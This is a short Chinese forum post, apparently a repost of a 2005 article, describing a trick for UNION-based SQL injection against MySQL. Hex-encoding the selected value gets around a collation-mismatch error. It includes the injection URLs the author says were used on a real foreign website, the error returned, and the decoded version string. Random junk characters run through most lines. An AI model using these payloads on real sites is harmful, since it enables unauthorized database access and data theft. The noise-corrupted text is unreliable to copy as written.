中国网络渗透测试联盟

标题: MySQL注射时ErrorNo.1267的突破 [打印本页]

作者: admin    时间: 2012-9-15 14:04
标题: MySQL注射时ErrorNo.1267的突破
本文作者:SuperHei
& ?0 s6 z5 ~$ w( l文章性质:原创
) M3 `2 }, Y4 N! n* c5 i发布日期:2005-10-181 L" \! ], Q& k, \# S8 `0 w' L$ z& X! ]
测试个国外的站时:. P0 }' r" p, \
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
9 I. v3 t+ F9 C% Q" g( r返回错误:
" ]6 R2 C; g, ~& H$ Y4 ^: O/ vIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
8 [4 ~8 h3 U6 Y8 M, {- @! DMySQL Error No. 126
) D5 \$ w; U7 |2 y5 Q+ }看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。  T: m& K8 J) C9 P- E) X2 F! I
解决办法:转为其他编码如hex。. t0 M/ ~' M9 F% H
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*! F3 ~' Z" i  R6 k+ ?8 h
成功得到hex(version())的值为:5 c7 i, P2 p  x; h4 G" _
342E312E332D62657461' D# J! w1 l/ C9 V9 M; n% H
回Mysql查询下得到:
, m5 d# F" `6 M, D: `- pmysql> select 0x342E312E332D62657461;7 K7 [/ Z/ ?2 j( g
+------------------------+
7 m, ~/ g7 h% h1 ^: y2 S  ~| 0x342E312E332D62657461 |- z7 X' K8 H' }! t7 W: C7 Z
+------------------------+
( E% d  P# ~' M| 4.1.3-beta |
5 l, o1 y7 ~2 ]  z% O+ T+------------------------+9 x- Z' H& |( k0 ^; }* S
1 row in set (0.00 sec)
1 ?* G1 c7 p+ Q( S
" f0 i! w7 |6 r7 [7 i




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2